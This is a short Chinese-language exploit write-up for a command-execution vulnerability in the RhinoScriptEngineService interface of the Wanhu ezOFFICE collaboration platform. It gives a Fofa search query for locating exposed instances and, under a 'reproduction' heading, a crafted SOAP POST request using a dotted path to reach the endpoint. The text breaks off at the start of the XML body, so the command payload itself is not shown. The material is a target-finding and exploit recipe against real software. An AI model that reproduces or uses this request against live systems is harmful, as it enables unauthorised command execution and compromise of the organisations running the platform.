简介
OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。
漏洞描述
万户ezOFFICE协同管理平台 RhinoScriptEngineService 接口存在命令执行漏洞,该漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
影响版本
万户ezOFFICE协同管理平台
Fofa:
app="万户网络-ezOFFICE"
漏洞复现
POST //defaultroot/services/./././RhinoScriptEngineService HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: '""'
Content-Length: 1211
<?xml version='1.0' encoding='UTF-8'?